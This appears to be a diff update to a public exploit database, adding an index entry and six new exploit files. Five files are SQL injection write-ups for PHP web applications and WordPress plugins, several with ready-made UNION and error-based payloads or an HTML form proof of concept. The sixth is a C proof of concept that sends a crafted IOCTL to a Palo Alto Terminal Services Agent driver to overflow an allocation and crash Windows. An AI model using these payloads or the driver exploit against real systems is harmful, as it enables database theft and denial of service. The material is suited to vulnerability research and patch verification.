DB: 2017-01-28

6 new exploits

Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow
My Photo Gallery 1.0 - SQL Injection
Maian Weblog 4.0 - SQL Injection
WordPress Plugin WP Private Messages 1.0.1 - SQL Injection
Online Hotel Booking System Pro 1.2 - SQL Injection
WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection

files.csv

@@ -8771,6 +8771,7 @@ id,file,description,date,author,platform,type,port
 41158,platforms/linux/local/41158.txt,"Man-db 2.6.7.1 - Privilege Escalation (PoC)",2015-12-02,halfdog,linux,local,0
 41171,platforms/linux/local/41171.txt,"Systemd 228 - Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",linux,local,0
 41173,platforms/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalation",2017-01-26,"Federico Bento",linux,local,0
+41176,platforms/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -37108,3 +37109,8 @@ id,file,description,date,author,platform,type,port
 41170,platforms/hardware/webapps/41170.txt,"TM RG4332 Wireless Router - Arbitrary File Disclosure",2017-01-26,"Saeid Atabaki",hardware,webapps,0
 41172,platforms/php/webapps/41172.txt,"PHPBack < 1.3.1 - SQL Injection / Cross-Site Scripting",2017-01-26,"Manish Tanwar",php,webapps,0
 41175,platforms/hardware/webapps/41175.txt,"Polycom VVX Web Interface - Change Admin Password",2017-01-26,"Mike Brown",hardware,webapps,0
+41177,platforms/php/webapps/41177.txt,"My Photo Gallery 1.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
+41178,platforms/php/webapps/41178.txt,"Maian Weblog 4.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
+41180,platforms/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2017-01-27,"Lenon Leite",php,webapps,0
+41181,platforms/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
+41182,platforms/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0

platforms/php/webapps/41177.txt

@@ -0,0 +1,30 @@
+Introduction
+
+Exploit Title: My Photo Gallery – SQL Injection
+Date: 27.01.2017
+Vendor Homepage: http://software.friendsinwar.com/
+Software Link: http://software.friendsinwar.com/news.php?readmore=40
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+ 
+Overview
+ 
+My Photo Gallery is a free is a user-friendly picture gallery script.
+Users can register and upload their images to the site. A moderator can see the images and validate, edit or delete them.
+The script comes with a very user friendly admin system where you can change and add many things such as: Categories, Images, Edit members, site looks and many more.
+
+Type of vulnerability:
+
+An SQL Injection vulnerability in My Photo Gallery allows attackers to read
+arbitrary administrator data from the database.
+
+Vulnerable Url:
+
+http://locahost/my_photo_gallery/image.php?imgid=[payload]
+Vulnerable parameter : imgid
+Mehod : GET
+
+Payload:
+imgid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x6652547066744842666d70594d52797173706a516f6c496f4d4b6b646f774d624a614f52676e6372,0x716b766b71)--

platforms/php/webapps/41178.txt

@@ -0,0 +1,26 @@
+Introduction
+
+Exploit Title: Maian Weblog – SQL Injection
+Date: 27.01.2017
+Vendor Homepage: http://www.maianweblog.com/
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+ 
+Overview
+ 
+Simple blog system for your website, Easily add/edit or delete blogs, Allow visitor comments for individual blogs, Optional e-mail notification for webmaster if comments are posted, Edit or delete visitor comments, BB Code, Calendar so visitors can view past archives, Support for multi language files, Show latest blogs/comments on blog page, Uses the Savant template engine.
+
+Type of vulnerability:
+
+An SQL Injection vulnerability in Maian Weblog allows attackers to read
+arbitrary data from the database.
+
+Vulnerable Url:
+
+http://locahost/weblog/blog/2[payload]/second-blog.html
+Mehod : GET
+
+Simple Payload:
+blog/2' AND (SELECT 2995 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(2995=2995,1))),0x717a787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'AUvx'='AUvx/q-blog.html

platforms/php/webapps/41180.txt

@@ -0,0 +1,38 @@
+# Exploit Title: WP Private Messages 1.0.1 – Plugin WordPress – Sql Injection
+# Exploit Author: Lenon Leite
+# Vendor Homepage: https://wordpress.org/plugins/wp-email-users/
+
+# Software Link: https://wordpress.org/plugins/wp-email-users/
+# Contact: http://twitter.com/lenonleite
+# Website: http://lenonleite.com.br/
+# Category: webapps
+# Version: 1.3.1
+# Tested on: Ubuntu 14.04
+
+1 - Description:
+
+Type user access: is accessible for any registered user
+
+$_REQUEST[‘edit’] is escaped wrong. Attack with Sql Injection
+
+http://lenonleite.com.br/blog/2017/01/17/english-wp-email-users-1-4-1-plugin-wordpress-sql-injection/
+
+2 - Proof of Concept:
+
+1 – Login as regular user (created using wp-login.php?action=register):
+
+2 – Using:
+
+<form action="http://localhost:8080/wp-admin/admin-ajax.php" method="post">
+<input type="text" name="action" value="weu_my_action">
+<input type="text" name="filetitle" value="0 UNION SELECT
+CONCAT(name,char(58),slug) FROM wp_terms WHERE term_id=1">
+<input type="text" name="temp_sel_key" value="select_temp">
+<input type="submit" name="">
+</form>
+
+
+3 - Timeline:
+
+- 12/01/2016 – Discovered
+- 13/12/2016 – Vendor not finded

platforms/php/webapps/41181.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Online Hotel Booking System Pro v1.2 - SQL Injection
+# Google Dork: N/A
+# Date: 27.01.2017
+# Vendor Homepage: http://www.bestsoftinc.com/
+# Software Buy: https://codecanyon.net/item/online-hotel-booking-system-pro/4606514
+# Demo: http://envato.bestsoftinc.net/hotel-booking-pro/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/roomtype-details.php?tid=[SQL]
+# E.t.c
+# # # # #
+

platforms/php/webapps/41182.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Online Hotel Booking System Pro v1.0 (WordPress Plugin) - SQL Injection
+# Google Dork: N/A
+# Date: 27.01.2017
+# Vendor Homepage: http://www.bestsoftinc.com/
+# Software Buy: https://codecanyon.net/item/online-hotel-booking-system-pro-wordpress-plugin/9338914
+# Demo: http://envato.bestsoftinc.net/wp-hotel-pro/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PLUGIN_PATH]/front/roomtype-details.php?tid=[SQL]
+# E.t.c
+# # # # #

platforms/windows/local/41176.c

@@ -0,0 +1,141 @@
+/*
+
+Exploit Title    - Palo Alto Networks Terminal Services Agent Integer Overflow
+Date             - 26th January 2017
+Discovered by    - Parvez Anwar (@parvezghh)
+Vendor Homepage  - https://www.paloaltonetworks.com/
+Tested Version   - 7.0.3-13 
+Driver Version   - 6.0.7.0 - panta.sys
+Tested on OS     - 32bit Windows 7 SP1 
+CVE ID           - CVE-2017-5329
+Vendor fix url   - https://securityadvisories.paloaltonetworks.com/ 
+                   https://securityadvisories.paloaltonetworks.com/Home/Detail/71
+Fixed Version    - 7.0.7 and later 
+Fixed driver ver - 6.0.8.0
+
+
+Disassembly
+-----------
+
+.text:9A26F0BD loc_9A26F0BD:                                                         
+.text:9A26F0BD                 mov     ecx, DeviceObject                             
+.text:9A26F0C3                 mov     dword ptr [ecx+1ACh], 0                       
+.text:9A26F0CD                 mov     edx, DeviceObject
+.text:9A26F0D3                 mov     eax, [edx+1B8h]                               ; eax points to our inputted buffer
+.text:9A26F0D9                 mov     ecx, [eax+14h]                                ; Takes size to allocate from our inputted buffer 0x04924925
+.text:9A26F0DC                 imul    ecx, 38h                                      ; 0x38 * 0x04924925 = 0x100000018. Wraps round becoming size to allocate 0x18 (Integer Overflow)
+.text:9A26F0DF                 mov     [ebp+NumberOfBytes], ecx                      ; Copy ecx value 0x18 onto stack
+.text:9A26F0E2                 push    44415450h                                     ; Tag (PTAD string used)
+.text:9A26F0E7                 mov     edx, [ebp+NumberOfBytes]                      ; Copy size 0x18 to edx
+.text:9A26F0EA                 push    edx                                           ; NumberOfBytes
+.text:9A26F0EB                 push    0                                             ; PoolType
+.text:9A26F0ED                 call    ds:ExAllocatePoolWithTag                      ; If returned null (eax) exits with error cleanly else takes crash path 
+.text:9A26F0F3                 mov     ecx, DeviceObject
+.text:9A26F0F9                 mov     [ecx+1B0h], eax
+.text:9A26F0FF                 mov     edx, DeviceObject
+.text:9A26F105                 cmp     dword ptr [edx+1B0h], 0                       ; Checks return value. If not null then jumps to our crash path
+.text:9A26F10C                 jnz     short loc_9A26F13C                            ; Exits with error cleanly if incorrect size value but not crashable value
+
+.text:9A26F13C
+.text:9A26F13C loc_9A26F13C:                                                         
+.text:9A26F13C                 mov     ecx, [ebp+NumberOfBytes]
+.text:9A26F13F                 push    ecx                                           ; 0x18 our allocated pool memory
+.text:9A26F140                 push    0                                             ; int, sets allocated memory to 0x00
+.text:9A26F142                 mov     edx, DeviceObject
+.text:9A26F148                 mov     eax, [edx+1B0h]
+.text:9A26F14E                 push    eax                                           ; Pointer to our allocated buffer
+.text:9A26F14F                 call    memset
+.text:9A26F154                 add     esp, 0Ch
+.text:9A26F157                 mov     [ebp+var_4], 0                                ; Null out ebp-4
+.text:9A26F15E                 jmp     short loc_9A26F169
+
+.text:9A26F160 loc_9A26F160:                                                         
+.text:9A26F160                 mov     ecx, [ebp+var_4]
+.text:9A26F163                 add     ecx, 1                                        ; Increment counter
+.text:9A26F166                 mov     [ebp+var_4], ecx                              ; Store counter value
+
+.text:9A26F169 loc_9A26F169:                                                         
+.text:9A26F169                 mov     edx, DeviceObject                             
+.text:9A26F16F                 mov     eax, [edx+1B8h]                               ; eax points to our inputted buffer
+.text:9A26F175                 mov     ecx, [ebp+var_4]                              ; Loop counter number
+.text:9A26F178                 cmp     ecx, [eax+14h]                                ; Compares our inputted buffer size 0x04924925. Here our
+                                                                                     ; size is not using the wrapped value so loops till BSOD
+.text:9A26F17B                 jnb     short loc_9A26F19A
+.text:9A26F17D                 mov     edx, [ebp+var_4]                              ; Counter value
+.text:9A26F180                 imul    edx, 38h
+.text:9A26F183                 mov     eax, DeviceObject
+.text:9A26F188                 mov     ecx, [eax+1B0h]                               ; Pointer to allocated pool copied to ecx
+.text:9A26F18E                 lea     edx, [ecx+edx+30h]                            ; pointer+size(0x38*edx)+0x30
+.text:9A26F192                 push    edx
+.text:9A26F193                 call    sub_9A26C000                                  ; Starts overwriting other pool allocations !!!
+.text:9A26F198                 jmp     short loc_9A26F160
+
+
+
+.text:9A26C000 sub_9A26C000    proc near                                             
+.text:9A26C000                                                                      
+.text:9A26C000
+.text:9A26C000 arg_0           = dword ptr  8
+.text:9A26C000
+.text:9A26C000                 push    ebp                                           
+.text:9A26C001                 mov     ebp, esp
+.text:9A26C003                 mov     eax, [ebp+arg_0]                              ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to eax
+.text:9A26C006                 mov     ecx, [ebp+arg_0]                              ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to ecx
+.text:9A26C009                 mov     [eax+4], ecx                                  ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30+4
+.text:9A26C00C                 mov     edx, [ebp+arg_0]                              ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to edx
+.text:9A26C00F                 mov     eax, [ebp+arg_0]                              ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to eax
+.text:9A26C012                 mov     [edx], eax                                    ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30
+.text:9A26C014                 pop     ebp
+.text:9A26C015                 retn    4
+.text:9A26C015 sub_9A26C000    endp
+
+
+
+*/
+
+
+
+#include <stdio.h>
+#include <windows.h>
+
+#define BUFSIZE 44
+
+
+int main(int argc, char *argv[]) 
+{
+    HANDLE         hDevice;
+    char           devhandle[MAX_PATH];
+    DWORD          dwRetBytes = 0;
+    unsigned char  buffer[BUFSIZE];
+
+
+    memset(buffer, 0x41, BUFSIZE);
+
+    printf("\n[i] Size of total input buffer %d bytes", BUFSIZE);
+
+    *(DWORD*)(buffer + 20) = 0x04924925;
+
+    sprintf(devhandle, "\\\\.\\%s", "panta");
+
+    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
+    
+    if(hDevice == INVALID_HANDLE_VALUE)
+    {
+        printf("\n[-] Failed to open device %s\n\n", devhandle);
+        return -1;
+    }
+    else 
+    {
+        printf("\n[+] Open %s device successful", devhandle);
+    }	
+
+    printf("\n[~] Press any key to continue . . .");
+    getch();
+
+    DeviceIoControl(hDevice, 0x88002200, buffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL); 
+
+    printf("\n");
+    CloseHandle(hDevice);
+    return 0;
+}
+